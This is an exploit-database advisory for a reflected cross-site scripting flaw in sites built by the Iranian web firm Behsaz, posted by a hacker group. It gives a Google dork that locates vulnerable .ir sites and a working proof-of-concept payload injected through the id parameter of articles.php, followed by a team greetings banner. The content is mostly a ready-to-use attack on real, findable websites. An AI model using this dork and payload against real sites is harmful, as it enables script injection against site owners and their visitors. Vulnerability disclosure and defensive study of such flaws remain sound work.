Site by Behsaz Cross Site Scripting

2016.05.16
Credit: 1337r00t
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

########################## # Exploit Title: Site by Behsaz Cross Site Scripting # Dork Google : inurl:/articles.php?id= "Site by Behsaz" site:.ir # We Are Hackers Saudi Arabia # Home: http://www.behsaz.ir/ # Discovered By: 1337r00t # Tested on : FireFox , Windows , LinuX ########################### |[+]----------------------------------------------------------------------------------|[+] # # Exploit :- # # http|s://[$site]/articles.php?id=[XSS] # ########################### # # p0c:- # # http|s://[$site]/articles.php?id=1</textarea>1<ScRiPt >prompt(1337)</ScRiPt> # # # |[+]----------------------------------------------------------------------------------|[+] ||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|| |[+] G2 Team :- |[+] Members: T34m D4rkn3ss R00m:- |[+] 1- Nine9 |[+] 2- [C]oder Girl: Safaa Hacker |[+] 3- xIL3zr |[+] 4- FreeDom |[+] 5- MjHoL HackEr |[+] 6- Hurabii HaCkEr |[+] 7- BL4ck M4n |[+]-------------------------------------------[+] |[+] G2 Friends : Killer~X - SraB HaCkEr -3NeeDaN HacKeR - Saudi HeX - 1337kSa - All My Friends |[+] ||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|| |[+] Twitter : 1337r00t |[+] Instagram : 1337r00t ||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top